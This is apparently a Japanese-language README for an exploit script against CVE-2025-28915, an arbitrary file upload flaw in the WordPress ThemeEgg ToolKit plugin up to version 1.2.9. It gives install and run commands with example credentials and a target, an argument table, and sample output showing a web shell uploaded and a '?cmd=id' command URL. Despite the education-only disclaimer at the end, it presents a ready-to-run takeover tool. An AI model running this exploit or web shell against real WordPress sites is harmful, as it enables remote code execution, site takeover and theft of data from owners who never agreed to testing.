
WordPress ThemeEgg ToolKit プラグイン <= 1.2.9 - 任意ファイルアップロードの脆弱性
WordPress 用プラグイン ThemeEgg ToolKit(バージョン ≤ 1.2.9)の無制限ファイルアップロード脆弱性により、認証済み攻撃者がサーバーにウェブシェルをアップロードできます。これにより、リモートコード実行 (RCE)、ウェブサイト全体の乗っ取り、機密データの漏えいにつながる可能性があります。
このスクリプトは、CVE-2025-28915 の悪用を以下の手順で自動化します:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| 引数 | 説明 |
|---|---|
-u | 対象の WordPress URL(例: http://target.com/wordpress) |
-un | WordPress ユーザー名 |
-p | WordPress パスワード |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
このスクリプトは教育および正規のセキュリティテスト目的のみに使用されます。無許可での使用は違法かつ非倫理的です。作者は誤用に対する一切の責任を負いません。
著者: Khaled Alenazi (Nxploit)